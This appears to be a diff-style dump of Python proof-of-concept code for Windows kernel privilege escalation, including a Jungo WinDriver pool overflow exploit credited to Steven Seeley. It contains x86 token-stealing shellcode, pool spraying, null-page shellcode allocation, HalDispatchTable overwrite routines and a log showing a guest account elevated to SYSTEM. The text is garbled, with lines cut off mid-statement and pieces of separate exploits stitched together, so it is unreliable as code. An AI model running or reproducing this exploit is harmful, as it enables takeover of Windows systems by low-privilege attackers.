resize(public_object_type_information, size.value) + elif result == STATUS_INVALID_HANDLE: + return None + else: + raise x_file_handles("NtQueryObject.2", hex (result)) + +def get_handles(): + """ + Return all the processes handles in the system at the time. + Can be done from LI (Low Integrity) level on Windows 7 x86. + """ + system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() + size = DWORD (sizeof (system_handle_information)) + while True: + result = ntdll.NtQuerySystemInformation( + SystemExtendedHandleInformation, + byref(system_handle_information), + size, + byref(size) + ) + result = signed_to_unsigned(result) + if result == STATUS_SUCCESS: + break + elif result == STATUS_INFO_LENGTH_MISMATCH: + size = DWORD(size.value * 4) + resize(system_handle_information, size.value) + else: + raise x_file_handles("NtQuerySystemInformation", hex(result)) + + pHandles = cast( + system_handle_information.Handles, + POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ + system_handle_information.NumberOfHandles) + ) + for handle in pHandles.contents: + yield handle.UniqueProcessId, handle.HandleValue, handle.Object + +def we_can_alloc_shellcode(): + """ + This function allocates the shellcode @ the null page making + sure the new OkayToCloseProcedure pointer points to shellcode. + """ + baseadd = c_int(0x00000004) + null_size = c_int(0x1000) + + tokenstealing = ( + "\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80" + "\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04" + "\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10" + "\x00" ) + + OkayToCloseProcedure = struct.pack(" 0: + return True + return False + +def alloc_pool_overflow_buffer(base, input_size): + """ + Craft our special buffer to trigger the overflow. + """ + print "(+) allocating pool overflow input buffer" + baseadd = c_int(base) + size = c_int(input_size) + input = "\x41" * 0x18 # offset to size + input += struct.pack("icacls poc.py +poc.py NT AUTHORITY\Authenticated Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(F) + Mandatory Label\Low Mandatory Level:(I)(NW) + +Successfully processed 1 files; Failed processing 0 files + +C:\Users\Guest\Desktop>whoami +debugee\guest + +C:\Users\Guest\Desktop>poc.py + + --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] + Steven Seeley (mr_me) of Source Incite + +(+) spraying pool with mixed objects... +(+) sprayed the pool! +(+) making pool holes... +(+) made the pool holes! +(+) allocating shellcode... +(+) allocated the shellcode! +(+) triggering pool overflow... +(+) allocating pool overflow input buffer +(+) elevating privileges! +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Guest\Desktop>whoami +nt authority\system + +C:\Users\Guest\Desktop> +""" +import os +import sys +import struct +from ctypes import * +from ctypes.wintypes import * +from platform import release, architecture + +kernel32 = windll.kernel32 +ntdll = windll.ntdll + +# GLOBAL VARIABLES +MEM_COMMIT = 0x00001000 +MEM_RESERVE = 0x00002000 +PAGE_EXECUTE_READWRITE = 0x00000040 +STATUS_SUCCESS = 0 + +class SYSTEM_MODULE_INFORMATION(Structure): + _fields_ = [("Reserved", c_void_p * 3), # this has an extra c_void_p because the first 4 bytes = number of return entries. + ("ImageBase", c_void_p), # it's not actually part of the structure, but we are aligning it. + ("ImageSize", c_ulong), + ("Flags", c_ulong), + ("LoadOrderIndex", c_ushort), + ("InitOrderIndex", c_ushort), + ("LoadCount", c_ushort), + ("ModuleNameOffset", c_ushort), + ("FullPathName", c_char * 256)] + +def alloc_shellcode(base, input_size, HalDispatchTable1): + """ + allocates some shellcode + """ + print "(+) allocating shellcode @ 0x%x" % base + baseadd = c_int(base) + size = c_int(input_size) + + # get the repair address + HalDispatchTable2 = struct.pack("| + input += "\x8B\x90\xF8\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET] + input += "\x89\x91\xF8\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx + # --[ recover] + input += "\xbe" + HalDispatchTable2 # mov esi, HalDispatchTable[2] + input += "\x8b\x16" # mov edx, [esi] + input += "\x81\xea\x12\x09\x00\x00" # sub edx, 0x912 + input += "\x83\xee\x04" # sub esi, 0x4 + input += "\x89\x16" # mov [esi], edx + input += "\x61" # popad + input += "\xC3" # ret + + input += "\xcc" * (input_size-len(input)) + ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, + POINTER(c_int), c_int, c_int] + dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, + byref(size), + MEM_RESERVE|MEM_COMMIT, + PAGE_EXECUTE_READWRITE) + if dwStatus != STATUS_SUCCESS: + print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff) + return False + written = c_ulong() + write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written)) + if write == 0: + print "(-) Error while writing our input buffer memory: %s" % write + return False + return True + +def alloc(base, input_size): + """ + Just allocates things. + """ + baseadd = c_int(base) + size = c_int(input_size) + ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, + POINTER(c_int), c_int, c_int] + dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, + byref(size), + MEM_RESERVE|MEM_COMMIT, + PAGE_EXECUTE_READWRITE) + if dwStatus != STATUS_SUCCESS: + print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff) + return False + return True + +def mymemset(base, location, size): + """ + A cheap memset ¯\_(ツ)_/¯ + """ + input = location * (size/len(location)) + written = c_ulong() + + write = kernel32.WriteProcessMemory(0xFFFFFFFF, base, input, len(input), byref(written)) + if write == 0: + print "(-) Error while writing our input buffer memory: %s" % write + return False + return True + +def get_HALDispatchTable_kernel_address(): + """ + This function gets the HALDispatchTable's kernel address + """ + # allocate arbitrary buffer and call NtQuerySystemInformation + b = create_string_buffer(0) + systeminformationlength = c_ulong(0) + res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength)) + + # call NtQuerySystemInformation second time with right size + b = create_string_buffer(systeminformationlength.value) + res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength)) + + # marshal raw bytes for 1st entry + smi = SYSTEM_MODULE_INFORMATION() + memmove(addressof(smi), b, sizeof(smi)) + + # get kernel image name + kernelImage = smi.FullPathName.split('\\')[-1] + print "(+) found %s kernel base address: 0x%x" % (kernelImage, smi.ImageBase) + + # load kernel image in userland and get HAL Dispatch Table offset + hKernelImage = kernel32.LoadLibraryA(kernelImage) + print "(+) loading %s in userland" % kernelImage + print "(+) found %s Userland Base Address : 0x%x" % (kernelImage, hKernelImage) + hdt_user_address = kernel32.GetProcAddress(hKernelImage,"HalDispatchTable") + print "(+) found HalDispatchTable userland base address: 0x%x" % hdt_user_address + + # calculate HAL Dispatch Table offset in kernel land + hdt_kernel_address = smi.ImageBase + ( hdt_user_address - hKernelImage) + print "(+) found HalDispatchTable kernel base address: 0x%x" % hdt_kernel_address + return hdt_kernel_address + +def write_one_null_byte(HWD, in_buffer, location): + """ + The primitive function + """ + mymemset(in_buffer, location, 0x1000) + if HWD: + IoStatusBlock = c_ulong() + dev_ioctl = ntdll.ZwDeviceIoControlFile(HWD, + None, + None, + None, + byref(IoStatusBlock), + 0x953824a7, # target + in_buffer, # special buffer + 0x1000, # just the size to trigger with + 0x20000000, # whateva + 0x1000 # whateva + ) + # we could check dev_ioctl here I guess + return True + return False + +def we_can_elevate(h, in_buffer, base): + """ + This just performs the writes... + """ + + # get location of first byte write + where2write = struct.pack("